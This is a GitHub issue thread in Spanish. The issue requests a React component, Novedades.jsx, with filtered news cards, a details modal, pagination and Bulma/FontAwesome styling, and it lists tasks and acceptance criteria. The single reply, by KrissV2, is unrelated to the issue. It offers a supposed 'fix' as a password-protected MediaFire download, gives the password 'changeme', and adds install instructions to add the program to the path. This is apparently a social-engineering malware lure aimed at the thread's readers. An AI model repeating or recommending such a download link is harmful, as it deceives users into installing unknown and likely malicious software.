### ISSUE TITLE
Desarrollar componente Novedades.jsx con Filtro, Cards, Modal y Paginación.

### ISSUE THREAD

**Issue by GabrielN2004** [GabrielN2004/Indumentaria-ruana-ELEL#1]
#### Descripción:
Crear un componente llamado `Novedades.jsx` que muestre noticias filtradas y organizadas en formato de cards. Cada card debe incluir una imagen, un resumen breve de la noticia y un botón que abra un modal con más detalles. También se debe implementar paginación para navegar entre diferentes páginas de noticias. Utilizar **React.js**, **Bulma** para estilos y diseño de las cards, y **FontAwesome** para los íconos.

#### Tareas:

1. **Estructura y diseño de Cards:**
   - Crear las cards para mostrar cada noticia.
   - Cada card debe incluir:
     - Una imagen.
     - Un resumen breve de la noticia.
     - Un botón de "Ver más" que abra un modal.
   
2. **Filtro de noticias:**
   - Implementar un input para filtrar las noticias por título o categoría.
   - Actualizar el listado de noticias según el criterio de búsqueda.

3. **Modal para mostrar detalles:**
   - Crear un modal que se active al presionar el botón "Ver más" en cada card.
   - Mostrar más información sobre la noticia en el modal.

4. **Paginación:**
   - Implementar la funcionalidad de paginación para mostrar un número limitado de noticias por página.
   - Incluir botones o links para navegar entre las páginas.

5. **Estilos con Bulma y FontAwesome:**
   - Usar **Bulma** para la disposición y diseño visual de las cards, el filtro, y la paginación.
   - Incluir íconos de **FontAwesome** donde sea necesario, por ejemplo, en el botón del modal o en los controles de paginación.

6. **Optimización:**
   - Asegurar que el diseño sea responsive y se vea bien en diferentes dispositivos.

#### Tecnologías:
- React.js
- Bulma (para diseño y estilos)
- FontAwesome (para íconos)

 **Criterios de aceptación**:
- El filtro de noticias debe funcionar correctamente, mostrando solo las noticias que coincidan con el criterio de búsqueda.
- Cada card debe tener una imagen, resumen, y botón para abrir el modal.
- La paginación debe permitir navegar entre múltiples páginas de noticias.
- El modal debe mostrar más detalles sobre la noticia seleccionada.
-

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
